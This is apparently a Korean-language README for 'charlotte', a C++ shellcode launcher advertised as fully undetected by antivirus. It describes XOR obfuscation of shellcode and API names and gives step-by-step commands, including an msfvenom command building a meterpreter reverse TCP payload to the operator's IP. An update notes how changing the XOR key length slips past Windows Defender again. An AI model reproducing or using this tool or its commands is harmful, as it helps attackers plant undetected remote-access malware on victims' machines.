charlotte
c++ 완전 미탐지 쉘코드 런처 ;)
아이의 탄생을 축하하며 이걸 공개합니다
설명
13/05/2021:
- c++ 쉘코드 런처, 2021년 5월 13일 기준 완전 미탐지 0/26
- win32 API 함수 동적 호출
- 쉘코드 및 함수 이름 XOR 암호화
- 실행마다 무작위 XOR 키 및 변수
- Kali Linux에서는 'apt-get install mingw-w64*'만 하면 됩니다!
17/05/2021:
- 무작위 문자열 길이 및 XOR 키 길이
antiscan.me

사용법
저장소를 클론하고, beacon.bin 이름으로 쉘코드 파일을 생성한 후 charlotte.py를 실행합니다.
예시:
- git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
- cd charlotte
- msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
- python charlotte.py
- 성공
msfvenom -p로 테스트됨 (아래 .gif POC 참조) 및 cobalt strike raw 형식 페이로드

업데이트 v1.1
17/05/21:
분명히 Microsoft Windows Defender가 .DLL 바이너리를 탐지할 수 있었습니다.
그리고 어떻게 플래그를 지정했을까요? 16바이트 크기의 여러 XOR 키를 찾아서였습니다.
아래 POC .gif에 표시된 것처럼 9로 변경하면 다시 미탐지 상태가 됩니다.
축하합니다!
